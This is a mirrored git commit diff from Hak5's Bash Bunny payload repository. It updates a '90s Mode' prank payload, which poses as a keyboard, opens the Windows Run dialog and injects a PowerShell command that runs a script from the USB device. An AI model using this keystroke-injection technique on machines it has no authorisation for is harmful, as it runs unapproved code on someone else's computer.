mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Updated 90s Mode for Bash Bunny v1.1
This commit is contained in:
parent
53a9e7fb69
commit
00cb49354b
@ -2,20 +2,16 @@
|
||||
#
|
||||
# Title: 90s Mode
|
||||
# Author: Hak5Darren
|
||||
# Version: 1.0
|
||||
# Version: 1.1
|
||||
# Category: Prank
|
||||
# Target: Windows XP SP3+
|
||||
#
|
||||
# Turns back the clock to a k-rad ultra ereet 1990's VGA resolution
|
||||
# Executes p.ps1 from the selected switch folder of the Bash Bunny USB Disk partition,
|
||||
|
||||
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
|
||||
source bunny_helpers.sh
|
||||
|
||||
LED R B
|
||||
LED SETUP
|
||||
GET SWITCH_POSITION
|
||||
ATTACKMODE HID STORAGE
|
||||
QUACK GUI r
|
||||
QUACK DELAY 100
|
||||
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\r.ps1')"
|
||||
QUACK ENTER
|
||||
LED G
|
||||
LED ATTACK
|
||||
RUN WIN powershell \".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\r.ps1')\"
|
||||
LED FINISH
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user